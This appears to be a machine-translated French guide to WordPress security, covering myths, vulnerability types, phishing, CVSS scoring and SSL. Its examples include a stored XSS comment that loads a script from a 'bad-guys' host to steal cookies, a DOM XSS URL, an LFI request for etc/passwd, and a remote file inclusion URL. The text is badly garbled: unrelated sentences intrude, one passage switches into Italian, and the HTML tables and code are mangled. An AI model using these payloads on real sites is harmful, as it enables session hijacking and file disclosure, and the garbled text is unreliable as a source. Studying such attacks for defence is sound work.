Sécurité WordPress: le Guide ultime

La sécurité de WordPress peut être intimidante, mais pas nécessairement. Dans ce guide complet de sécurité WordPress, nous avons simplifié les bases de la protection des sites WordPress afin que tout non – technicien puisse comprendre et protéger ses sites contre les pirates informatiques. Ce guide de sécurité WordPress est divisé en 10 sections faciles à comprendre. Chaque section vous guidera sur des aspects spécifiques de la sécurité WordPress. À la fin de ce guide, vous découvrirez les différents types de vulnérabilités, les raisons du piratage et tout sur la façon de protéger les utilisateurs individuels, du serveur au site WordPress.
Plongeons! Section 1 de ce guide: WordPress est – il sûr? WordPress est – il sûr? En bref, la réponse est oui. WordPress représente près de 40% de tous les sites Internet. L’une des principales raisons de la popularité de WordPress est qu’il s’agit d’une plateforme très sécurisée pour créer tout, des blogs aux grands magasins de commerce électronique. Y a – t – il des problèmes de sécurité avec wordpress? Bien que WordPress lui – même soit sûr, éviter les erreurs de sécurité de WordPress nécessite un peu d’effort de la part du propriétaire du site. En fait, le plus gros problème de sécurité de WordPress est ses utilisateurs. Le propriétaire du site peut éviter la plupart des attaques de piratage WordPress sur la plateforme avec un peu d’effort.
Ne t’inquiète pas, on va te protéger. Ce guide vous apprendra tout ce dont vous avez besoin pour protéger votre site Web. Il y a cinq choses que nous devons savoir avant de protéger notre site. Pourquoi les pirates informatiques attaquent – ils différents types de sites WordPress pirates informatiques types spécifiques de vulnérabilités WordPress comment empêcher les vulnérabilités WordPress comment déterminer la gravité de la vulnérabilité pourquoi les pirates informatiques devraient – ils attaquer mon site Web? C’est un problème de sécurité WordPress commun que vous pouvez résoudre dans le pire des cas
Je voudrais remercier le Rapporteur pour son excellent rapport. Cela ne signifie toutefois pas que tout le monde le fasse légalement et moralement. Même les plus petits sites Web, les hackers font des profits élevés. L’argent est tout ce dont ils ont besoin, mais certaines personnes apprécient le sentiment de pouvoir qu’elles ont acquis lorsqu’elles ont violé avec succès un site Web, mais la grande majorité des gens font des affaires uniquement pour de l’argent. Section 2: Découvrez quelques mythes de sécurité WordPress avant de continuer à lire le reste de ce guide de sécurité WordPress.
Vous trouverez beaucoup de conseils de sécurité WordPress qui circulent sur Internet, de la part de personnes bien intentionnées qui veulent vraiment vous aider. Malheureusement, certaines de ces astuces sont basées sur le mythe de sécurité de WordPress et n’ajoutent pratiquement aucune sécurité supplémentaire au site WordPress. En effet, certains \
La fréquence est mentionnée comme un mythe. Nombre de maux de tête causés par les mythes. Le mythe donne un faux sentiment de sécurité. Vous devriez cacher votre administrateur URL \ WP ou votre login \ WP (également connu sous le nom de cache Backend). L’idée derrière cacher un administrateur Wp est que les pirates informatiques ne peuvent pas déchiffrer ce qu’ils ne peuvent pas trouver. Si votre URL de connexion n’est pas une URL WordPress standard \ WP admin \, n’êtes – vous pas vulnérable à la violence? En fait, la plupart des caractéristiques de l’arrière – plan caché sont
Et le thème parfait et le numéro de version WordPress. Cependant, il y a des robots sans cerveau qui cherchent sur Internet des vulnérabilités connues dans le Code réel qui fonctionne sur votre site, de sorte que cacher le nom du sujet et le numéro de version WP ne vous protégera pas. 3. Vous devriez renommer votre répertoire de contenu WP le Répertoire de contenu WP contient vos plug – ins, sujets et dossiers de téléchargement de médias. Il y a beaucoup de bonnes choses et de code exécutable dans un répertoire, donc il est compréhensible que les gens veulent prendre l’initiative de protéger ce dossier. Malheureusement, changer le nom du contenu WP ajoutera une couche de sécurité supplémentaire au site, ce qui est le mythe de sécurité de WordPress. Il ne le fera pas. Nous pouvons facilement trouver le nom du Répertoire de contenu WP modifié en utilisant les outils de développement de navigateur. Dans la capture d’écran ci – dessous, nous pouvons voir que j’ai renommé le Répertoire de contenu de ce site Web en \ test \. Le changement de nom de répertoire n’ajoute aucune sécurité au site, mais il peut causer des conflits de chemin de répertoire \ contenu WP \ plug – in codé dur. Mon site n’est pas assez grand pour attirer l’attention des hackers sur ce mythe de sécurité WordPress qui rend de nombreux sites vulnérables aux attaques. Même si vous possédez un petit site avec peu de trafic, il est essentiel de protéger activement votre site. Même si vous possédez un petit site avec peu de trafic, il est essentiel de protéger activement votre site. Le fait est que votre site Web ou votre entreprise n’a pas besoin d’être grand pour attirer l’attention d’un attaquant potentiel. Les pirates informatiques ont encore la possibilité d’utiliser votre site Web comme un moyen de rediriger Certains visiteurs vers des sites malveillants, d’envoyer du spam à partir de serveurs de courrier, de propager des virus et même d’extraire B
Votre site Web sera l’un des millions de sites Web les plus visités chaque mois. De nombreux hackers attaquent votre site dans l’intention de l’infecter avec des logiciels malveillants. Les logiciels malveillants sont de petits morceaux de code qui peuvent être utilisés pour apporter des changements malveillants à un site Web. Si votre site Web est infecté par des logiciels malveillants, il est important d’être informé dès que possible. Chaque minute qu’un logiciel malveillant reste sur votre site, il peut causer plus de dommages à votre site. Plus le site est endommagé, plus il faut de temps pour le nettoyer et le restaurer. Il est essentiel de vérifier la santé du site Web en scannant régulièrement les logiciels malveillants. C’est pourquoi il est essentiel de continuer à vérifier l’état de santé du site Web en scannant les logiciels malveillants. Un hacker de ransomware pourrait vouloir attaquer votre site Web pour obtenir ransomware. Le ransomware signifie que lorsque le hacker contrôle votre site, il ne vous sera pas publié à moins que vous ne payiez des frais élevés. Le temps d’arrêt moyen pour les attaques de ransomware est de 9,5 jours. Combien cela vous coûtera – t – il de ne pas vendre pendant 10 jours? La rançon moyenne demandée par les pirates informatiques a fortement augmenté, passant de 294 $en 2015 à plus de 13 000 $en 2020. Grâce à ce mode de paiement, la criminalité en ligne n’a pas ralenti. Au fur et à mesure que ces communautés criminelles se développent, il devient de plus en plus important de protéger et de protéger adéquatement votre site Web. 4. Site corrompu certains hackers peuvent attaquer votre site pour le plaisir. Un piratage qui n’est pas si diabolique par nature est un site de diffamation. Ce sont généralement des enfants ou des jeunes qui commencent tout juste à jouer au piratage. Ils l’ont fait pour
Un hacker peut être utilisé pour effectuer des entrées malveillantes. Gardez à l’esprit que les hackers Web sont presque toujours automatisés. Pour cette raison, les hackers peuvent facilement accéder à un grand nombre de sites Web, presque en un clin d’oeil. Les hackers utilisent des outils spéciaux pour scanner les vulnérabilités connues sur Internet. Les hackers aiment les cibles faciles à attaquer, et avoir un site Web avec un logiciel qui exécute des vulnérabilités connues est comme donner aux hackers des instructions étape par étape pour accéder à votre site WordPress, serveur, ordinateur ou tout autre appareil connecté à Internet. Notre rapport mensuel de collecte des vulnérabilités WordPress couvre toutes les vulnérabilités dans WordPress Core, les plug – ins WordPress et les sujets de divulgation publique. Dans ces collections, nous partageons le nom du plug – in ou du sujet de vulnérabilité, la version touchée et le type de vulnérabilité. Qu’est – ce qu’une vulnérabilité de jour zéro? Une vulnérabilité de jour zéro est une vulnérabilité qui est divulguée publiquement avant qu’un développeur ne publie un correctif de vulnérabilité. En parlant de sécurité WordPress, il est important de comprendre la définition de la vulnérabilité de jour zéro. Comme la vulnérabilité a été divulguée au public, les développeurs n’ont pas eu le temps de la corriger. Cela a une grande influence sur votre plug – in et votre thème. Souvent, les chercheurs en sécurité découvrent les vulnérabilités et les divulguent en privé aux développeurs de l’entreprise qui possèdent le logiciel. Les chercheurs et les développeurs en sécurité conviennent que des détails complets seront publiés dès que le correctif sera disponible. Après la publication du correctif, la divulgation de la vulnérabilité peut être légèrement retardée afin de donner à un plus grand nombre de personnes le temps de mettre à jour les principales vulnérabilités en matière de sécurité. Cependant, si le développeur ne répond pas au chercheur
En ce qui concerne la sécurité ou l’absence de correctifs de vulnérabilité, les chercheurs peuvent divulguer publiquement des vulnérabilités afin de faire pression sur les développeurs pour qu’ils publient des correctifs. La divulgation publique des vulnérabilités et l’introduction apparente d’une journée zéro pourraient être contre – productives. Mais c’est le seul moyen pour les chercheurs de faire pression sur les développeurs pour qu’ils corrigent les bogues. Le projet zéro de Google a des lignes directrices similaires pour l’exposition aux vulnérabilités. Ils ont publié tous les détails de la fuite 90 jours plus tard. Si la vulnérabilité a été corrigée. N’importe qui peut le découvrir. Si un hacker découvre une vulnérabilité avant que le développeur ne publie le correctif, ce sera le pire cauchemar de l’utilisateur final… Zéro jour utilisé activement. Qu’est – ce qu’une vulnérabilité de jour zéro activement exploitée? Une vulnérabilité de jour zéro activement exploitée est ce à quoi elle ressemble. Il s’agit d’une vulnérabilité non corrigée que les pirates informatiques peuvent cibler, exploiter et exploiter activement. À la fin de 2018, les pirates informatiques exploitent activement de graves vulnérabilités WordPress dans le plug – in de conformité WP gdpr. Cette vulnérabilité permet aux utilisateurs non autorisés de modifier les paramètres d’inscription des utilisateurs du WP et de changer le nouveau rôle d’utilisateur par défaut de l’abonné à l’Administrateur, comme décrit dans la section suivante. Ces hackers ont découvert cette vulnérabilité avant le plug – in de conformité WP gdpr et les chercheurs en sécurité. Par conséquent, tout site Web qui a installé le plugin est une marque de commerce simple et garantie pour les cybercriminels. La meilleure façon de se protéger contre une vulnérabilité de jour zéro la meilleure façon de protéger un site Web contre une vulnérabilité de jour zéro est de désactiver et de supprimer le logiciel jusqu’à ce que la vulnérabilité soit corrigée. Heureusement, les développeurs du plug – in de conformité WP gdpr ont
Le lendemain de sa divulgation, il a rapidement publié un correctif pour cette vulnérabilité. Une vulnérabilité sans correctif rend votre site facile à cibler par des pirates informatiques. Vulnérabilité WordPress non validée et validée lorsque vous parlez de vulnérabilité WordPress, vous devez également comprendre deux autres termes. Non authentifié: une vulnérabilité WordPress non authentifiée signifie que n’importe qui peut l’exploiter. Vérifié: une vulnérabilité WordPress validée signifie qu’un utilisateur connecté est nécessaire pour exploiter cette vulnérabilité. Il est difficile pour un hacker d’exploiter une vulnérabilité qui nécessite un utilisateur authentifié, en particulier une vulnérabilité qui nécessite des privilèges d’administrateur. De plus, si un hacker possède déjà un ensemble d’identifiants d’administrateur, il n’a pas vraiment besoin d’exploiter la vulnérabilité pour créer de la confusion. Il y a un avertissement. Certaines vulnérabilités authentifiées n’ont besoin que d’exploiter la fonctionnalité au niveau de l’abonné. Si votre site permet à quelqu’un de s’inscrire, il n’y a pas beaucoup de différence entre cette vulnérabilité et une vulnérabilité non vérifiée. En parlant de vulnérabilité WordPress, il y a 21 types communs de vulnérabilité. Nous avons introduit chaque type de vulnérabilité WordPress. La vulnérabilité de contournement d’authentification permet à un attaquant de contourner les exigences d’authentification et d’exécuter des tâches qui sont généralement réservées aux utilisateurs authentifiés. L’authentification est le processus d’authentification de l’utilisateur. WordPress exige des utilisateurs qu’ils saisissent un nom d’utilisateur et un mot de passe pour s’authentifier. Contournement de l’authentification l’exemple d’application valide l’authentification en fonction d’un ensemble fixe de paramètres. Un attaquant peut modifier ces paramètres pour accéder à ce qui est normalement nécessaire
Les scripts croisés réfléchissants se produisent lorsqu’un script malveillant est envoyé au serveur dans une demande du client (une demande de l’utilisateur dans le navigateur), réfléchi par le serveur et exécuté par le navigateur. Supposons que votre favesite soit un exemple de réflexion de script inter – site. Com demande l’accès à certains contenus du site. Supposons que ce site n’encode pas correctement l’entrée de l’utilisateur. Un attaquant peut exploiter cette vulnérabilité en créant un lien malveillant et en le partageant avec un utilisateur de votre site. Courriels et messages sur les médias sociaux. Je suis ton préféré. L’outil com \ Cool attaqué utilise l’outil de raccourcissement d’URL pour rendre les liens malveillants non menaçants et très cliquables, yourfavesite. Com \ cool things. Cependant, lorsque vous cliquez sur le lien raccourci, le lien complet s’exécute à partir de votre navigateur de site. Com \ cool things? Q = quelque chose de cool Liens Une vulnérabilité de script xss stockée ou inter – site stockée permet à un hacker d’injecter du Code malveillant et de le stocker sur un serveur d’application Web. Exemple de script inter – site archivé un attaquant a trouvé votre site. Com permet aux visiteurs d’intégrer des balises HTML dans la section commentaires du site. Puis l’attaquant a créé un nouveau commentaire: excellent article! Voir un autre grand article . <\script&src=”http:bad-guys.compasswordstealingcode.js . Dopo aver fatto clic sul collegamento, verrai indirizzato a yourfavesite.com e lo script dannoso verrà riflesso nel tuo browser, consentendo yourfavesite.com di dirottare i cookie di sessione e yourfavesite.com account yourfavesite.com . Come prevenire lo scripting cross-site riflesso La regola n. 5 sul cheat sheet di prevenzione cross-scripting di OWASP è la codifica dell'URL prima di inserire dati non attendibili nei valori dei parametri URL HTML. Questa regola può aiutare a prevenire la creazione di una vulnerabilità XSS riflessa quando si aggiungono dati non attendibili nel valore del parametro HTTP GET. Remarque: la vulnérabilité xss reflétée invite les visiteurs à cliquer sur le lien de code malveillant pour l’exécuter. Les attaques xss stockées n’ont besoin que d’accéder aux pages qui contiennent des commentaires. Le Code malveillant est exécuté chaque fois que la page est chargée. Maintenant que notre voyou a ajouté ce commentaire, tous les futurs visiteurs de cette page seront exposés à ses scripts malveillants. Le script est hébergé sur le site Web de l’attaquant et peut détourner C
Basé sur Dom en envoyant l’URL suivante au nouvel utilisateur: http:\\yourfavesite.com\account?name=
Alertes (document.cookie) Lorsque le nouvel utilisateur clique sur le lien, le navigateur envoie une demande: \ Account? Nom = Alertes (document.cookie) Un méchant. Com. Le site répondra en utilisant la page contenant le code JavaScript ci – dessus. Le navigateur du nouvel utilisateur crée un objet Dom pour la page qui contient des objets de document. L’emplacement contient une chaîne: http:\\www.bad-guys.com\account?name= Alertes (document.cookie)

Le code original sur la page ne veut pas que les paramètres par défaut contiennent des balises HTML, mais plutôt des balises sur la page de réponse. Le navigateur du nouvel utilisateur rendra ensuite la page et exécutera le script de l’attaquant: Alert (document.cookie) How to Prevent Dom – Based Cross site scripting Preventing Cheat Sheet Rule 1 est HTML Escape. JS s’échappe ensuite avant d’ajouter des données non fiables au sous – contexte HTML dans le contexte d’exécution. Exemple de méthode HTML dangereuse: attributs d’élément. InnerHTML = \
Période Exemples d’escalade des privilèges dans notre résumé de vulnérabilité WordPress de novembre 2020, nous signalons une vulnérabilité d’escalade des privilèges trouvée dans le plug – in membre final (qui a été corrigé dans la version 2.1.12). Un attaquant peut fournir des paramètres de tableau pour les éléments utilisateurs de la capacité wp \ u qui définissent le rôle de l’utilisateur. Au cours du processus d’inscription, les détails d’inscription soumis sont transmis à la fonction Update _ profile et toutes les métadonnées soumises, peu importe ce qui est envoyé, sont mises à jour pour les utilisateurs nouvellement enregistrés. Cette vulnérabilité permet essentiellement aux nouveaux utilisateurs de demander à un administrateur pendant leur inscription. Comment empêcher la mise à jour des permissions ithemes Security pro peut aider à protéger votre site contre les contrôles d’accès corrompus en limitant l’accès des administrateurs à la liste des périphériques de confiance. Vulnérabilité d’exécution de code à distance RCE ou vulnérabilité d’exécution de code à distance permet à un attaquant d’accéder et de modifier, voire de contrôler un ordinateur ou un serveur. Exemple d’exécution de code à distance en 2018, Microsoft a découvert une vulnérabilité d’exécution de code à distance dans Excel. En exploitant avec succès cette vulnérabilité, un attaquant peut exécuter du Code arbitraire dans le contexte de l’utilisateur actuel. Si l’utilisateur actuel est connecté avec des privilèges d’utilisateur administratifs, un attaquant peut prendre le contrôle du système affecté. L’attaquant peut alors installer le programme; Afficher, modifier ou supprimer des données; Ou créer un nouveau compte avec des privilèges d’utilisateur complets. Les utilisateurs dont les comptes sont configurés pour avoir moins de privilèges d’utilisateur sur le système peuvent être moins touchés que les utilisateurs suivants:
La Commission a également adopté une proposition de directive qui est à peu près identique à la législation des États Membres en matière de taxes sur le chiffre d’affaires. La façon la plus simple d’éviter l’exécution de code à distance pour atténuer la vulnérabilité RCE est de valider l’entrée de l’utilisateur en filtrant et en supprimant les caractères indésirables. Notre société mère, Liquid Web, a un article sur la prévention de l’exécution de code à distance. Vulnérabilité à l’inclusion de fichiers une vulnérabilité à l’inclusion de fichiers se produit lorsqu’une application Web permet à un utilisateur d’envoyer des entrées à un fichier ou de télécharger un fichier sur un serveur. Il existe deux types de fichiers qui contiennent des vulnérabilités, locales et distantes. Vulnérabilité d’inclusion de fichiers locaux LFI ou vulnérabilité d’inclusion de fichiers locaux permet à un attaquant de lire et parfois d’exécuter des fichiers sur un serveur de site Web. Un exemple d’inclusion d’un fichier local nous amène à votre site Web. Com, où le chemin passé à l’instruction contenant n’est pas nettoyé correctement. Par exemple, regardons l’URL ci – dessous. Yourfavesite. Com \ module. Php? Fichier = exemple. Un attaquant de fichier peut modifier les paramètres d’URL pour accéder à des fichiers arbitraires sur le serveur. Yourfavesite. Com \ module. Php? File = etc \ passwd changer la valeur du fichier dans l’URL pourrait permettre à un attaquant de voir le contenu du fichier psswd. Comment empêcher l’inclusion d’une liste de fichiers autorisés que la page de création de fichiers locaux peut contenir, puis utiliser un identificateur pour accéder au fichier sélectionné. Toute demande contenant un identificateur invalide est ensuite bloquée. Vulnérabilité d’inclusion de fichiers distants RFI ou vulnérabilité d’inclusion de fichiers distants permet à un attaquant d’inclure des fichiers, généralement en exploitant le mécanisme d’inclusion de fichiers dynamiques mis en œuvre dans l’application cible. Fichiers distants avec spritz désactivés dans le dépôt contenant des exemples de plug – ins WP WordPress
Tolly Word Press. Org, parce qu’il a une vulnérabilité RFI. Voici le code source de la vulnérabilité: if (isset ($u Get [‘URL]) {$content = File _ get Contents ($u Get [‘ URL]); vous pouvez l’exploiter en modifiant la valeur de content.filter.php? Url = value. Exemple: yoursite.com \ \ WP content \ plugins \ WP with spritz \ wp.spritz.content.filter.php? Url = http Http: \ \ Bad gues. Empêche com \ exec qui contient des fichiers distants de créer une liste de fichiers autorisés que la page peut contenir, puis d’accéder au fichier sélectionné en utilisant un identificateur. Toute demande contenant un identificateur invalide est ensuite bloquée. Une vulnérabilité de traversée de répertoire ou de fichier permet à un attaquant de lire des fichiers arbitraires sur le serveur exécutant l’application. Échantillons croisés de répertoires les versions 5.7 à 5.03 de WordPress sont vulnérables aux attaques croisées de répertoires parce qu’elles ne valident pas correctement les données d’entrée de l’utilisateur. Un attaquant accédant à un compte avec au moins les privilèges d’auteur peut exploiter une vulnérabilité de traversée de répertoire et exécuter du Code PHP malveillant sur le serveur sous – jacent pour une capture à distance complète. Comment empêcher les développeurs croisés de répertoires d’utiliser des index au lieu de la partie réelle du nom de fichier lors de la création de modèles ou d’utiliser des fichiers de langue. Vulnérabilité de redirection malveillante une vulnérabilité de redirection malveillante permet à un attaquant d’injecter du Code pour rediriger un visiteur de site Web vers un autre site Web. L’exemple de redirection malveillante suppose que vous êtes à la recherche d’un pull bleu dans une boutique en ligne à l’aide d’un outil de recherche. Malheureusement, le serveur boutique ne peut pas encoder correctement l’entrée de l’utilisateur et
Octets \ sec. Il existe deux façons principales de prévenir les attaques par déni de service et d’atténuer les attaques dos. Achetez plus d’hôtes que vous n’en avez besoin. Avoir des ressources supplémentaires peut vous aider à surmonter la croissance de la demande causée par les attaques dos. Utilisez un pare – feu au niveau du serveur, comme cloudflare. Un pare – feu peut détecter des pointes anormales de trafic et empêcher la surcharge du site. Enregistrement des touches l’enregistrement des touches est également appelé enregistrement du clavier ou acquisition du clavier. L’enregistrement des touches se produit lorsque le hacker surveille et enregistre secrètement les touches pressées par les visiteurs du site. Exemple d’enregistrement de keysequence en 2017, un hacker a installé avec succès un JavaScript malveillant sur le serveur du fabricant de smartphones oneplus. Un attaquant utilise du Code malveillant pour surveiller et enregistrer les clés du client oneplus lorsqu’il entre les détails de la carte de crédit. Avant qu’oneplus ne détecte et répare les attaques de pirates informatiques, les pirates informatiques ont enregistré et recueilli des informations clés sur 40 000 clients. Comment empêcher la mise à jour complète de l’enregistrement de la chaîne de clés! En général, un attaquant doit utiliser une autre vulnérabilité existante pour insérer un enregistreur de clavier dans un ordinateur ou un serveur. La mise à jour de tout le contenu avec les derniers correctifs de sécurité évitera de donner aux pirates un moyen facile d’installer un Keylogger sur votre site Web ou votre ordinateur. Avantage: la vulnérabilité du logiciel d’Hameçonnage est la seule vulnérabilité que les pirates informatiques et les cybercriminels tentent d’exploiter. Les hackers ciblent également les humains et les utilisent pour attaquer. Une utilisation courante est l’hameçonnage. Qu’est – ce que l’hameçonnage? L’hameçonnage est une méthode d’attaque en ligne qui utilise le courriel, les médias sociaux, les messages texte et le téléphone pour tromper les victimes en leur fournissant des renseignements personnels. L’attaquant utilisera ensuite ces informations pour accéder à un compte personnel ou
Fraude à l’identité. Comment détecter les courriels d’hameçonnage comme nous l’avons vu précédemment dans cet article, certaines vulnérabilités nécessitent un certain type d’interaction utilisateur pour être exploitées. Une façon pour les hackers d’attirer les gens dans leurs activités maléfiques est d’envoyer des e – mails d’hameçonnage. Apprenez à identifier les courriels d’hameçonnage pour éviter de participer involontairement à des programmes de cybercriminels. 4 conseils pour détecter les courriels d’hameçonnage: voir l’adresse électronique de l’expéditeur: Si vous recevez un courriel d’une entreprise, la partie de l’adresse électronique de l’expéditeur qui suit « @ » doit correspondre au nom de l’entreprise. Si un courriel représente une entreprise ou une entité gouvernementale, mais utilise une adresse électronique publique comme « @ gmail », il s’agit d’un courriel d’hameçonnage. Notez les petites erreurs d’orthographe dans le nom de domaine. Par exemple, regardons cette adresse e – mail [protégée par e – mail] et nous pouvons voir que Netflix a un \
Déterminer l’utilisateur en fonction de la nécessité d’exploiter l’interaction utilisateur pour la vulnérabilité. Si l’interaction utilisateur n’est pas nécessaire pour permettre à un attaquant d’exploiter la vulnérabilité, elle est plus élevée.

Description des exigences en matière d’interaction utilisateur <TITLE> No (n) Les systèmes vulnérables peuvent être exploités sans aucune interaction utilisateur. <BR> Demande Pour exploiter correctement cette vulnérabilité, l’utilisateur doit prendre certaines mesures avant de l’exploiter, par exemple en le persuadant de cliquer sur un lien dans un courriel. 1.1.5. Les scores de portée sont basés sur les vulnérabilités des composants logiciels qui ont une incidence sur les ressources en dehors de leur portée de sécurité. La portée de la sécurité comprend d’autres composants qui ne fournissent que des fonctions à ce composant, même s’ils ont leurs propres permissions de sécurité. Les scores sont plus élevés lorsque la plage change. Description de l’utilisation Pas de changement Les vulnérabilités exploitées ne peuvent affecter que les ressources gérées par la même institution. Dans ce cas, les parties vulnérables et touchées coïncident. <!DOCTYPE foo [ Modifié </p> <table class="has-fixed-layout"> La vulnérabilité exploitée peut affecter des ressources qui dépassent les permissions d’autorisation fournies par le composant vulnérable. Dans ce cas, les composantes vulnérables et touchées sont différentes. </p> <tr> <tr> <tr> 1,2. Indicateurs d’impact les indicateurs d’impact saisissent l’impact direct d’une exploitation réussie. 1.2.1. Impact confidentiel (c) ce score d’impact confidentiel mesure l’impact sur la vie privée de l’information gérée par le logiciel utilisé. Plus la perte du logiciel touché est importante, plus le score est élevé. </p> <td> <td> Incidence sur la description de la confidentialité </p> <td> <td> <tr> Élevé (h) </p> <tr> <td> Perte totale de confidentialité, entraînant<br /> Divulguer toutes les ressources du logiciel attaqué à l’attaquant. </p> <td> <td> <td> <tr> Faible (l) </p> <tr> <td> Une certaine perte de confidentialité. Un attaquant peut accéder à des informations confidentielles. </p> <td> <td> <td> <tr> No (n) </p> <tr> <td> La confidentialité n’est pas perdue dans le logiciel utilisé. </p> <td> <td> <td> 1.2.2. Intégrité (Io) ce score d’intégrité est basé sur l’impact d’une exploitation réussie sur l’intégrité. Plus les conséquences du logiciel touché sont importantes, plus le score est élevé. </p> <tr> <table> Impact sur la description de l’intégrité </p> <table class="has-fixed-layout"> <tr> <tr> Élevé (h) </p> <tr> <td> Perte totale d’intégrité ou perte totale de protection. </p> <td> <td> <td> <tr> Faible (l) </p> <tr> <td> La modification des données n’aura pas d’impact direct important sur le logiciel touché. </p> <td> <td> <td> <tr> No (n) </p> <table> <table class="has-fixed-layout"> Il n’y a pas de perte d’intégrité dans le logiciel touché. </p> <tr> <tr> <tr> 1.2.3. Disponibilité (A) les scores de disponibilité sont basés sur l’impact de disponibilité du logiciel développé. Plus les conséquences de la partie touchée sont importantes, plus le score est élevé. </p> <td> <td> Impact sur la description de la disponibilité </p> <td> <td> <tr> Élevé (h) </p> <tr> <td> Une perte totale de disponibilité entraîne un déni total d’accès aux ressources du logiciel attaqué. </p> <td> <td> <td> <tr> Faible (l) </p> <tr> <td> Réduction du rendement ou interruption de la disponibilité des ressources. </p> <td> <td> <td> <tr> No (n) </p> <table> <table class="has-fixed-layout"> Il n’y a pas d’impact sur la disponibilité des logiciels touchés. </p> <tr> <tr> <tr> Calcul de la fraction de base de la fraction cvss la fraction de base est fonction des équations dans les sous – points d’influence et de développement. Où la note de base est définie comme si </p> <td> <td> Valeur d’expiration décrite par Code </p> <td> <td> <tr> Non défini </p> <tr> <td> L’attribution de cette valeur à une mesure n’affecte pas les scores. C’est un signal que la formule de notation saute cet indicateur. </p> <td> <td> <td> <tr> Élevé (h) </p> <table> <table class="has-fixed-layout"> Il existe un code de fonction distinct ou aucune exploitation n’est nécessaire, et les détails sont largement disponibles.<br /> Ou optimiser la notation environnementale en fonction de l’environnement de l’utilisateur. </p> <tr> <tr> Valeur descriptive de la Sous – fraction d’influence </p> <tr> <td> <td> Non défini (CR: x) </p> <td> <td> La perte (confidentialité \ intégrité \ disponibilité) peut avoir un impact limité sur l’Organisation. </p> <tr> <tr> <td> <td> Faible (CR: l) </p> <td> <td> Le risque de perte (confidentialité \ intégrité \ disponibilité) a de graves répercussions sur l’Organisation. </p> <tr> <table> <table class="has-fixed-layout"> <tr> Moyen (CR: m) </p> <tr> <tr> La perte (confidentialité \ intégrité \ disponibilité) peut avoir des effets désastreux sur l’Organisation. </p> <td> <td> <td> <td> Élevé (CR: h) </p> <tr> <tr> C’est un signal qui ignore ce score. </p> <td> <td> <td> Calcul des scores cvss environnementaux les scores environnementaux sont définis comme si (score d’impact modifié) </p> <td> <tr> Cvss fraction Gravity </p> <tr> <td> <td> 0 </p> <td> <td> Il n’y en a pas. </p> <tr> <table> <table class="has-fixed-layout"> <tr> 0,1 – 3,9 </p> <tr> <tr> Faible </p> <td> <td> <td> <td> 4,0 – 6,9 </p> <tr> <tr> Moyenne </p> <td> <td> <td> <td> 7,0 – 8,9 </p> <tr> <tr> Haut </p> <td> <td> <td> <td> 9,0 – 10,0 </p> <tr> <table> Critique </p> <table class="has-fixed-layout"> <tr> <tr> Exemple d’évaluation de la gravité des cvss dans le monde réel dans notre résumé de vulnérabilité de décembre 2020, nous avons signalé une vulnérabilité dans le plug – in SMTP Easy WP. La vulnérabilité de jour zéro (dont nous discuterons dans la section suivante) permet à un attaquant de contrôler un compte administrateur et est largement exploitée. En regardant les entrées de la base de données nationale sur les vulnérabilités, nous pouvons découvrir la gravité de la vulnérabilité SMTP du WP. </p> <tr> Analysons quelques choses à partir des captures d’écran de la nvdb SMTP WP ci – dessus. Note de base: la note de base est de 7,5, ce qui indique un niveau élevé de gravité de la vulnérabilité. Vecteurs: les vecteurs nous disent que les scores sont basés sur l’équation de vulnérabilité cvss 3.1 et les indicateurs utilisés pour calculer les scores. C’est la partie métrique du vecteur. Av: N \ AC: L \ PR: N \ ui: N \ S: U \ C: H \ I: N \ A: n maintenant, dans cet article, nous utilisons les valeurs et les descriptions des mesures de base précédentes pour comprendre les huit valeurs des mesures vectorielles. Av: N – cela signifie le vecteur d’attaque de vulnérabilité (av)<br /> Réticulum Comprendre comment un attaquant tente d’envahir notre site Web et ses cibles après avoir violé notre site Web peut nous aider à établir une défense appropriée. Dans la section suivante, vous apprendrez comment protéger votre site contre presque tous les types d’attaques que les pirates informatiques peuvent vous lancer. Section 4: protéger votre serveur la première étape de la politique de sécurité WordPress est de protéger votre serveur. Le serveur stocke tous les fichiers et le Code qui font fonctionner le site. Dans cette section, vous apprendrez l’importance de choisir un bon animateur. Comment chiffrer les communications sur un site Web. Comment un pare – feu peut vous aider à protéger votre site. Tous les hôtes Web ne sont pas les mêmes et à long terme, le choix d’un seul hôte en fonction du prix peut entraîner des coûts supplémentaires pour les problèmes de sécurité WordPress. La plupart des environnements gérés partagés sont sécurisés, mais certains ne séparent pas correctement les comptes utilisateurs. Votre hôte doit être vigilant lors de l’application des derniers correctifs de sécurité et suivre d’autres bonnes pratiques de sécurité WordPress importantes liées à la sécurité des serveurs et des fichiers. Votre hôte devrait être attentif à l’application des derniers correctifs de sécurité et suivre d’autres pratiques exemplaires importantes en matière de sécurité de l’hôte liées à la sécurité des serveurs et des fichiers. Le chiffrement des sites WordPress à l’aide de la couche SSL Secure Sockets (également appelée SSL) est une technique de sécurité qui assure le chiffrement entre le client et le serveur Web. Plus simplement, un « client » est un navigateur Web comme chrome ou Safari, et un « serveur Web » est votre site Web ou votre boutique en ligne. Une façon simple de savoir si le site Web que vous visitez a un certificat SSL installé est de voir la barre d’adresse de votre navigateur pour voir si l’URL commence par http ou HTTPS. Si l’URL commence par HTTPS, vous pouvez naviguer en toute sécurité sur des sites Web utiles<br /> Utilisez SSL. Pourquoi SSL est – il si important? 2021 l’absence d’un certificat SSL est coûteuse. Comment est – ce possible? Si SSL n’est pas activé sur votre site Web, il sera difficile pour les Prospects de découvrir votre présence et ceux qui trouvent votre site peuvent avoir peur de vous donner de l’argent. Chaque fois que nous faisons des achats en ligne, il y a une communication entre votre navigateur et la boutique en ligne. Par exemple, lorsque nous entrons un numéro de carte de crédit dans notre navigateur, celui – ci le partagera avec la boutique en ligne. Lorsque le magasin reçoit le paiement, dites au navigateur que votre achat a été réussi. Une chose à garder à l’esprit au sujet de l’information partagée entre le navigateur et le serveur Store est que l’information passe par plusieurs stations pendant la transmission. SSL crypte la communication pour s’assurer que notre carte de crédit n’est pas visible avant d’atteindre la destination finale du serveur store. Pour mieux comprendre comment fonctionne le cryptage, réfléchissez à la façon dont nos achats sont livrés. Si vous avez déjà surveillé l’état de livraison de vos achats en ligne, vous verrez combien d’arrêts votre commande est passée avant d’arriver chez vous. Si le vendeur n’emballe pas ce que vous achetez, les gens peuvent facilement voir ce que vous achetez. SSL est un outil clé pour empêcher les attaquants d’intercepter des informations sensibles telles que les mots de passe et les numéros de carte de crédit partagés entre le client et le serveur Web. Pourquoi chaque site Web doit – il avoir un certificat SSL? Les avantages de sécurité de WordPress d’avoir un certificat SSL sur votre site sont suffisants pour en faire une option incontournable sur n’importe quel site. Cependant, pour encourager tout le monde à protéger les visiteurs de leur site, les navigateurs Web et les 